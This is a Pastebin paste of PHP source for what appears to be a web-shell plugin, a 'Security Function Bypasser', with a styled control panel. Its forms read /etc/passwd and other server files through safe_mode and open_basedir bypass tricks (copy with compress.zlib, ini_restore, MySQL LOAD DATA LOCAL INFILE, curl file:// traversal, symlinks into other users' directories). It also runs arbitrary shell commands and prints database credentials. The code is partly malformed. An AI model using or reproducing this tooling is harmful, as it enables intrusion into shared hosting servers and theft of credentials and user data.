API tools faq
paste
Advertisement
Spyhackerz

ypass

Spyhackerz
Aug 12th, 2017
144
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 22.79 KB | None | 0 0
raw download clone embed print report
  1. <?php ?><?php
  2. echo "<link rel='shortcut icon' href='http://www.dz-streaming.eu/favicon.ico'>
  3. <style type='text/css'>
  4. input[type=submit], input[type=button], input[type=reset]{
  5.    text-align:center;
  6.    background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
  7.    border:1px solid #4D4D4D;
  8.    color:#CCCCCC;
  9.    border-top-color:#565656;
  10.    padding:4px 6px;
  11.    margin:4px 5px;
  12.    height:16px;
  13.    -moz-box-shadow:0 0 1px black;
  14.    -webkit-box-shadow:0 0 1px black;
  15.    box-shadow:0 0 1px black;
  16.    text-shadow:0 1px black;
  17.    -moz-border-radius:4px;
  18.    -webkit-border-radius:4px;
  19.    -khtml-border-radius:4px;
  20.    border-radius:4px;
  21.    height:23px;
  22. }
  23. input[type=submit]:hover , input[type=button]:hover, input[type=reset]:hover{
  24.    background-position:center top;
  25.    text-decoration:none;
  26. }
  27. input[type=text], input[type=password]{
  28.    background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
  29.    border:1px solid #4D4D4D;
  30.    color:#CCCCCC;
  31.    border-top-color:#565656;
  32.    -moz-box-shadow:0 0 1px black;
  33.    -webkit-box-shadow:0 0 1px black;
  34.    box-shadow:0 0 1px black;
  35.    -moz-border-radius:4px;
  36.    -webkit-border-radius:4px;
  37.    -khtml-border-radius:4px;
  38.    border-radius:4px;
  39.    height:18px;
  40.    margin-left: 5px;
  41. }
  42. input , textarea , button , body , caption , table ,area , option {
  43.    outline:none;
  44.    transition: all 0.20s ease-in-out;
  45.    -webkit-transition: all 0.25s ease-in-out;
  46.    -moz-transition: all 0.25s ease-in-out;
  47.    border-radius:3px;
  48.    -webkit-border-radius:3px;
  49.    -moz-border-radius:3px;
  50.    border:1px solid rgba(0,0,0, 0.2);
  51. /*   font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
  52. }
  53. input , textarea {
  54.    background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
  55. }
  56. input:focus, textarea:focus ,button:active , body:focus , caption:focus , table:focus ,area:focus ,option:focus  {
  57.    box-shadow: 0 0 5px rgba(0, 0, 255, 1);
  58.    -webkit-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
  59.    -moz-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
  60.    border: 1px solid #CCCC00;
  61.    background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
  62.    overflow: auto;
  63. /*    font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
  64. }
  65. body{
  66. /*    font-family : Verdana; */
  67.    color : #f9f6f1;
  68.    font-size : 0.7em;
  69.    background: url(http://i44.tinypic.com/i56tc9.jpg) no-repeat center top #252525;
  70. }
  71. input , textarea {
  72.    outline:none;
  73.    transition: all 0.20s ease-in-out;
  74.    -webkit-transition: all 0.25s ease-in-out;
  75.    -moz-transition: all 0.25s ease-in-out;
  76.    border-radius:3px;
  77.    -webkit-border-radius:3px;
  78.    -moz-border-radius:3px;
  79.    border:1px solid rgba(0,0,0, 0.2);
  80. }
  81. input:focus, textarea:focus {
  82.  outline: 0;
  83.  border-color: rgba(82, 168, 236, 0.8);
  84.  -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  85.  -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  86.  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  87.    background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
  88.    overflow: auto;
  89. }
  90.  </style>
  91.  
  92. function actionbypss() {
  93. wsoHeader();
  94. echo '
  95. <center>
  96. <a href=# onclick="g(\'etcnmd\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[      Server User Function Bypasser       ]</a><br><br>
  97. <a href=# onclick="g(\'etcbaypass\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[      Etc/passwd/ Function Bypasser      ]</a><br><br>
  98. <a href=# onclick="g(\'SafeMode\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Safe Mode Bypass ]</a><br>
  99. ';
  100.                                                         wsoFooter();
  101.                                                     }
  102.                                                     ####################### bypassing #########################
  103.                                                    function actionbypassing() {
  104.                                                         wsoHeader();
  105.                                                         echo '<center><h1>Security Function Bypasser </h1>';
  106.                                                         error_reporting(0);
  107.                                                         set_magic_quotes_runtime(0);
  108.                                                         if (version_compare(phpversion(), '4.1.0') == - 1) {
  109.                                                             $_POST = & $HTTP_POST_VARS;
  110.                                                             $_GET = & $HTTP_GET_VARS;
  111.                                                             $_SERVER = & $HTTP_SERVER_VARS;
  112.                                                         }
  113.                                                         function inclink($link, $val) {
  114.                                                             $requ = $_SERVER["REQUEST_URI"];
  115.                                                             if (strstr($requ, $link)) {
  116.                                                                 return preg_replace("/$link=[\d\w\W\D\S]*/", "$link=$val", $requ);
  117.                                                             } elseif (strstr($requ, "showsc")) {
  118.                                                                 return preg_replace("/showsc=[\d\w\W\D\S]*/", "$link=$val", $requ);
  119.                                                             } elseif (strstr($requ, "hlp")) {
  120.                                                                 return preg_replace("/hlp=[\d\w\W\D\S]*/", "$link=$val", $requ);
  121.                                                             } elseif (strstr($requ, "?")) {
  122.                                                                 return $requ . "&" . $link . "=" . $val;
  123.                                                             } else {
  124.                                                                 return $requ . "?" . $link . "=" . $val;
  125.                                                             }
  126.                                                         }
  127.                                                         function delm($delmtxt) {
  128.                                                             print "<center><table bgcolor=black style='border:1px solid #008080' width=99% height=2%>";
  129.                                                             print "<tr><td><b><center><font size=2 color=#008080>$delmtxt</td></tr></table></center>";
  130.                                                         }
  131.                                                         function callfuncs($cmnd) {
  132.                                                             if (function_exists(shell_exec)) {
  133.                                                                 $scmd = shell_exec($cmnd);
  134.                                                                 $nscmd = htmlspecialchars($scmd);
  135.                                                                 print $nscmd;
  136.                                                             } elseif (!function_exists(shell_exec)) {
  137.                                                                 exec($cmnd, $ecmd);
  138.                                                                 $ecmd = join("
  139. ", $ecmd);
  140.                                                                 $necmd = htmlspecialchars($ecmd);
  141.                                                                 print $necmd;
  142.                                                             } elseif (!function_exists(exec)) {
  143.                                                                 $pcmd = popen($cmnd, "r");
  144.                                                                 while (!feof($pcmd)) {
  145.                                                                     $res = htmlspecialchars(fgetc($pcmd));;
  146.                                                                     print $res;
  147.                                                                 }
  148.                                                                 pclose($pcmd);
  149.                                                             } elseif (!function_exists(popen)) {
  150.                                                                 ob_start();
  151.                                                                 system($cmnd);
  152.                                                                 $sret = ob_get_contents();
  153.                                                                 ob_clean();
  154.                                                                 print htmlspecialchars($sret);
  155.                                                             } elseif (!function_exists(system)) {
  156.                                                                 ob_start();
  157.                                                                 passthru($cmnd);
  158.                                                                 $pret = ob_get_contents();
  159.                                                                 ob_clean();
  160.                                                                 print htmlspecialchars($pret);
  161.                                                             }
  162.                                                         }
  163.                                                         function input($type, $name, $value, $size) {
  164.                                                             if (empty($value)) {
  165.                                                                 print "<input type=$type name=$name size=$size>";
  166.                                                             } elseif (empty($name) && empty($size)) {
  167.                                                                 print "<input type=$type value=$value >";
  168.                                                             } elseif (empty($size)) {
  169.                                                                 print "<input type=$type name=$name value=$value >";
  170.                                                             } else {
  171.                                                                 print "<input type=$type name=$name value=$value size=$size >";
  172.                                                             }
  173.                                                         }
  174.                                                         function permcol($path) {
  175.                                                             if (is_writable($path)) {
  176.                                                                 print "<font color=#008080>";
  177.                                                                 callperms($path);
  178.                                                                 print "</font>";
  179.                                                             } elseif (!is_readable($path) && !is_writable($path)) {
  180.                                                                 print "<font color=red>";
  181.                                                                 callperms($path);
  182.                                                                 print "</font>";
  183.                                                             } else {
  184.                                                                 print "<font color=white>";
  185.                                                                 callperms($path);
  186.                                                             }
  187.                                                         }
  188.                                                         if ($dlink == "dwld") {
  189.                                                             download($_REQUEST['dwld']);
  190.                                                         }
  191.                                                         function download($dwfile) {
  192.                                                             $size = filesize($dwfile);
  193.                                                             @header("Content-Type: application/force-download;name=$dwfile");
  194.                                                             @header("Content-Transfer-Encoding: binary");
  195.                                                             @header("Content-Length: $size");
  196.                                                             @header("Content-Disposition: attachment; filename=$dwfile");
  197.                                                             @header("Expires: 0");
  198.                                                             @header("Cache-Control: no-cache, must-revalidate");
  199.                                                             @header("Pragma: no-cache");
  200.                                                             @readfile($dwfile);
  201.                                                             exit;
  202.                                                         }
  203. ?>
  204. <?
  205. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
  206. $sf="<form method=post>";$ef="</form>";
  207. $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
  208. $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
  209. $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
  210. $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
  211. $sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>";
  212. ///////////////////////////////
  213.                              //
  214. $mysql_use = "no"; //"yes"   //
  215. $mhost = "localhost";        //
  216. $muser = "root";             //
  217. $mpass = "pass";             //
  218. $mdb = "name";               //
  219. $them = "xxx"; //any site    //
  220. $you = "xx"; //your username //
  221. $flib = "hack15.txt";        //
  222. $folder = "hack15.txt";      //
  223. ///////////////////////////////
  224. ################# PhP Hacked ########################
  225. // read greet //
  226. if ($linux=='greet')
  227. {
  228.   echo "</textarea>";
  229. }
  230. // read file unzend sorce //
  231. if(empty($_POST['sorce'])){
  232. } else {
  233. }
  234. // read file unzend functions //
  235.  if(empty($_POST['func'])){
  236. } else {
  237. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  238. $zeen=$_POST['func'];
  239. require("$zeen");
  240. echo "Database : ".$config['Database']['dbname']." <X> ";
  241. echo "UserName : ".$config['MasterServer']['username']." <X> ";
  242. echo "Password : ".$config['MasterServer']['password']." <X> ";
  243. echo "</textarea></p>";
  244. }// read file symlink ( ) //
  245. if(empty($_POST['sym'])){
  246. } else {
  247. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  248. $fp = fopen("hack15.txt","w+");
  249. fwrite($fp,"Php Hacker Was Here");
  250. @unlink($flib);
  251. $sym = "/home/" . $them . "/public_html/" . $k;
  252. $link = "/home/"  . $you . "/public_html/" . $folder . "/" . $flib;
  253. @symlink($sym, $link);
  254. if ($k{0} == "/") {
  255. echo "<script> window.location = '" . $flib . "'</script>";
  256. }else{
  257. echo "<pre><xmp>";
  258. echo readlink($flib) . "
  259. ";
  260. echo "Filesize: " . linkinfo($flib) . "B
  261.  
  262. ";
  263. echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/"  . $folder . "/" . $flib);
  264.   echo "</textarea>";
  265. }
  266. }
  267.  
  268. // read file plugin ( ) //
  269. if(empty($_POST['plugin'])){
  270. } else {
  271. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  272. for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
  273.  $ara = posix_getpwuid($uid);
  274.   if (!empty($ara)) {
  275.        while (list ($key, $val) = each($ara)){
  276.         print "$val:";
  277.   }
  278.   print "
  279. ";
  280.      }
  281.   }
  282.   echo "</textarea>";
  283. }
  284. // read file id ( ) //
  285. if ($_POST['rid'] ){
  286. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  287.  for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
  288. $ara = posix_getpwuid($uid);
  289.  if (!empty($ara)) {
  290. while (list ($key, $val) = each($ara)){
  291. print "$val:";
  292. }
  293.  print "
  294. ";
  295. }
  296.  }
  297. echo "</textarea>";
  298. break;
  299.  
  300.  }
  301. // read file imap ( ) //
  302. $string = !empty($_POST['rimap']) ? $_POST['rimap'] : 0;
  303. if(empty($_POST['rimap'])){
  304. } else {
  305. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  306. $stream = imap_open($string, "", "");
  307. $str = imap_body($stream, 1);
  308. echo "</textarea>";
  309. }
  310. // read file Curl ( ) //
  311. if(empty($_POST['curl'])){
  312. } else {
  313. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  314. $m=$_POST['curl'];
  315. $ch =
  316. curl_init("file:///".$m."/../../../../../../../../../../../../".__FILE__);
  317. curl_exec($ch);
  318. var_dump(curl_exec($ch));
  319. echo "</textarea>";
  320. }
  321. // read file SQL ( ) //
  322. if(empty($_POST['ssql'])){
  323. } else {
  324. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  325. $file=$_POST['ssql'];
  326. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
  327. $mysql_files = explode(':', $mysql_files_str);
  328. $sql = array (
  329. "USE $mdb",
  330. 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
  331. "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
  332. . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
  333. . "ESCAPED BY          '' "
  334. . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
  335. "SELECT a FROM $tbl LIMIT 1"
  336. );
  337. mysql_connect ($mhost, $muser, $mpass);
  338.                                 foreach ($sql as $statement) {
  339.                                    $q = mysql_query ($statement);
  340.                                    if ($q == false) die (
  341.                                       "FAILED: " . $statement . "
  342. " .
  343.                                       "REASON: " . mysql_error () . "
  344. "
  345.                                    );
  346.                                    if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
  347.                                    echo htmlspecialchars($r[0]);
  348.                                    mysql_free_result ($q);
  349.                                 }
  350. echo "</textarea>";
  351. }
  352. // read file copy & ini ( ) //
  353. if (isset ($_REQUEST['safefile'])){
  354. $file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
  355. if(empty($_GET['file'])){if(empty($_POST['file'])){
  356. print "<center>[ Please choose a file first to read it using copy() ]</center>";
  357. } else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
  358. $temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
  359. $zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
  360. fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
  361. print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
  362. </CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
  363. ini_restore("safe_mode");ini_restore("open_basedir");
  364. print "<center><pre>".$sta;
  365. if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}
  366. }
  367. </center><table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr><td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%>
  368. <tr><td height=22% style="border:1px #dadada solid "><div><b>
  369. <center>
  370. Using copy() function</div></tr></td><tr>
  371. <td style="border:1px #dadada solid "><form method=post>&nbsp;
  372. <input type=text name=safefile value=/etc/passwd size=75 >
  373. <input type=hidden name=scdir value=/etc/passwd >  
  374. <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
  375. </center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr>
  376. <td height=22% style="border:1px #dadada solid "><div><b><center>
  377. Using ini_restore() function</div></tr></td><tr>
  378. <td style="border:1px #dadada solid "><form method=post>&nbsp;
  379. <input type=text name=inifile value=/etc/passwd size=75 >
  380. <input type=hidden name=scdir value=/etc/passwd >  
  381. <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
  382. </center></tr></td></form></table></td></tr></table><table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr>
  383. <td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
  384. Using sql() function</div></tr></td><tr>
  385. <td style="border:1px #dadada solid "><form method=post>&nbsp;
  386. <input type=text name=ssql value=/etc/passwd size=75 >
  387. <input type=hidden name=scdir value=/etc/passwd >
  388. <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
  389. </center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
  390. Using Curl() function</div></tr></td><tr>
  391. <td style="border:1px #dadada solid "><form method=post>&nbsp;
  392. <input type=text name=curl value=/etc/passwd size=75 >
  393. <input type=hidden name=scdir value=/etc/passwd >
  394. <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
  395. </center></tr></td></form></table></td></tr></table>
  396. <table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr><td width=50%><div align=left>
  397. <table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
  398. Using imap() function</div></tr></td><tr>
  399. <td style="border:1px #dadada solid "><form method=post>&nbsp;
  400. <input type=text name=rimap value=/etc/passwd size=75 >
  401. <input type=hidden name=scdir value=/etc/passwd >
  402. <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
  403. </center></tr></td></form></table></td>
  404. <td height=20% width=50%><div align=right>
  405. <table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
  406. Using id() function</div></tr></td><tr>
  407. <td style="border:1px #dadada solid "><form method=post>&nbsp;
  408. <input type=text name=rid value=/etc/passwd size=75 >
  409. <input type=hidden name=scdir value=/etc/passwd >
  410. <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
  411. </center></tr></td></form></table></td></tr></table><table bgcolor=#2A2A2A style="border:2px solid black" width=100%>
  412. <tr><td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
  413. Using plugin() function</div></tr></td><tr>
  414. <td style="border:1px #dadada solid "><form method=post>&nbsp;
  415. <input type=text name=plugin value=/etc/passwd size=75 >
  416. <input type=hidden name=scdir value=/etc/passwd >
  417. <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
  418. </center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr>
  419. <td height=22% style="border:1px #dadada solid "><div><b><center>
  420. Using symlink() function</div></tr></td><tr>
  421. <td style="border:1px #dadada solid "><form method=post>&nbsp;
  422. <input type=text name=sym value=/etc/passwd size=75 >
  423. <input type=hidden name=scdir value=/etc/passwd >
  424. <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
  425. </center></tr></td></form></table></td></tr></table>
  426. <?php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!